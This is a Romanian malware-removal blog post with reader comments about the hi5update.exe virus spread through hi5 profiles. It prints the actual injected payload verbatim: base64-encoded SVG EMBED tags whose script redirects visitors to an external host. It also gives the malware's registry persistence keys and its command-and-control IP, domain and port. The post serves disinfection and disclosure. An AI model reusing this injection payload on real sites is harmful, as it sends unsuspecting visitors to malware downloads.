Virusul hi5update.exe – Instructiuni pentru Devirusare

De cateva zile hi5-ul este sub atac. Nu, nu este vorba nici de teroristi, nici de atacuri de tip DDoS care sa “traga pe dreapta” site-ul, ci tinta este utilizatorul acestei retele sociale.
La accesarea profilurilor unor anumite persoane (sau chiar profilul propriu) vi se va afisa urmatoarea fereastra de descarcare a fisierului hi5update.exe:

hi5update.exe virus

Orice neavizat va crede ca este o actualizare pentru hi5 si o va instala cu bucurie… si totusi hi5-ul este un soft care sa necesite update-uri instalate in PC-ul utilizatorului ? Nicidecum, deci acest asa-zis fisier de actualizare este de fapt un virus, hostat pe un site romanesc (http://rp-legal.ro).

Ce este interesant, site-ul apartine asociatiei de avocati Pricop & Banu, fiind in constructie. Probabil ca paznicul santierului doarme, iar hotii au plasat “bomba”.

Virusul se foloseste de o vulnerabilitate CSS, “uitata” de creatorii hi5 si care apare in una din sectiunile urmatoare: Interese (Interests) – rubrica “Citat preferat” sau Despre mine (About me).


Pentru a scapa de infectie stergeti codul urmator, aflat in una din ariile enuntate anterior:

<EMBED SRC=”data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6L y93d3cudzMub3JnLzIwMDA vc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9 zdmciIHhtbG5zOnhsaW5rPSJodHRwOi 8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk 9IjAiIHdpZHRoPSIxOTQiIGhla WdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0PmRvY3VtZW50LmxvY2F0aW 9uPSdodHRwOi8vMzcyOC50MzUuY29tLzEuaHRtJ zs8L3NjcmlwdD48L3N2Zz4=” type=”image/svg+xml” AllowScriptAccess=”always” width=”0″ height=”0″></EMBED><EMBED SRC=”data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc 9Imh0dHA6Ly93d3cudzMub3JnLzI wMDAvc3ZnIiB4bWxucz0iaHR0cD ovL3d3dy53My5vcmcvMjAwMC9 zdmciIHhtbG5zOnhsaW5rPSJodH RwOi8vd3d3LnczLm9yZy8xOTk5 L3hsaW5rIiB2ZXJzaW9uPSIxLjAiI Hg9IjAiIHk9IjAiIHdpZHRoPSIxOTQ iIGhlaWdodD0iMjAwIiBpZD0ieHNz Ij48c2NyaXB0PmRvY3VtZW50Lm xvY2F0aW9uPSJodHRwOi8vMzcy OC50MzUuY29tLzIuaHRtIjs8L3Nj cmlwdD48L3N2Zz4=” type=”image/svg+xml” AllowScriptAccess=”always” width=”0″ height=”0″></EMBED>



Ce face virusul?

Ei bine, odata rulat se copiaza in C:\Windows\system32\boot.exe si isi asigura rularea automata la fiecare pornire a Windows-ului prin crearea cheilor registry:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run \Font
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{F558BB66-9E94-169D-CD42-491BD5039254}
.
De asemenea trimite date printr-o interogare DNS catre un server 79.117.73.154 ( Romania, Constanta, RDS ) – 3728.zapto.org
Utilizeaza portul 3460 pentru a trimite date (probabil activitate keylogger), deci il puteti bloca in Firewall.

DEVIRUSARE:

1. Automata (Metoda Recomandata):
Descarcati Dr.Web CureIT sau Kaspersky Removal Tool si scanati complet PC-ul stergand infectiile gasite.


2. Manuala:
Stergeti cheile registry si fisierul indicat anterior. Puteti folosi Unlocker in cazul in care fisierul nu poate fi sters normal.

Administrator FaraVirusi.com
voluntar al Comodo Malware Research Team, expert Malwarebytes Anti-Malware

4 responses to “Virusul hi5update.exe – Instructiuni pentru Devirusare”

  1. Cata

    Nu cred ca va pacali prea multi useri, pentru ca multi dintre acestia il inchid pentru ca nu stiu ce este acel fisier, ori stie ca hi5-ul nu este un soft si nici nu se atinge de acel fisier.

  2. Devirusare

    Hi5.com este curat acum. Nu a fost infectat decat cateva ore. Am reusit sa suspend pe 3 ianuarie site-ul avocatilor printr-un mail la host. Vad ca a revenit si fisierul mai este prezent. Dupa asta, fisierul a fost mutat pe ala cu barazii de craciun(ambele site-uri sparte). Dar vulnerabilitatea a fost indepartata de pe site ca nu se mai incarca java script-ul acela sa injecteze cod.

    Sunt 2 versiuni, unul mai mare decat cealalt. Pe ambele le-am trimis la analiza atunci.

  3. Devirusare

    Man, in Firefox nu imi mai arata ca injecteaza nimic. Pe 3 ianuarie se incarca de pe t35 si inca un site niste scripturi. Acum vad ca nu mai e asa.

    Sa vedem totusi…O sa mai arunc o privire.

Leave a Reply